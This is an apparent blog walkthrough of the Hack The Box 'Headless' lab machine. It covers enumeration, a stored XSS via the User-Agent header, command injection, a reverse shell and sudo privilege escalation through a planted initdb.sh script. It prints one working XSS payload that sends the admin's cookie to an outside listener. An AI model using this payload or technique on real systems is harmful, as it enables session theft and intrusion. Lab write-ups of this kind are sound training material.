Headless | Hack The Box Walk through

Bikram kharal
3 min readApr 3, 2024

--

Hello Guys,

It’s me Bikram Kharal back in medium to write about the Seasonal machine of the Hack The Box.

Initial Enumeration

First of all i did a simple nmap scan to enumerate all the ports in the box.

nmap -sC -sV Machine_IP -T4

I found that open ports are 22 and 5000.

I saw that port 5000 is running a web service.Visiting that location we got a interface like below:

Clicking on For questions button we got a interface to contact support.

By seeing this page i started adding random values and intercepted the proxy with burpsuite.

When i added a simple XSS payload in message section we got prompted with ‘Hacking Attempt Detected.

I suspected that this web service was vulnerable to XSS vulnerability.But no any value send via contact support are getting reflected.

After researching for few minutes , I tried injecting XSS payload in the User-Agent Section and surprisingly it got fired.

Now we need to find and construct a XSS payload to steal the cookies of an admin.

After adding below payload on the User-Agent and i started my python server as shown below.

<img src=x onerror=document.location="http://10.10.14.57:8000/?c="+document.cookie>

And finally we got admin cookie.

Using admin cookie i again tried to bruteforce the directory if we could get useful path using ffuf.

Yes, We got /dashboard path using the admin cookie.

I tried to access the dashboard and interface was like:

I clicked on Generate Report button and intercepted the request with burp proxy.

I initially I tried to inject command injection payload and we got the response immediately.

Now it’s time to get reverse shell :)

Going 1 directory back we got a user.txt

Post Exploitation

I tried basic Linux privilege escalation techniques.Using sudo -l we found that `usr/bin/syscheck` without sudo password.

Reading the code of syscheck file i found that it is running `initdb.sh` file with sudo privilege.

I instantly created a new file called initdb.sh with reverse shell payload and i runned that /usr/bin/syscheck file and we got our shell with sudo privilege.

Thank you all for reading.

Till then Happy Hacking :)

--

--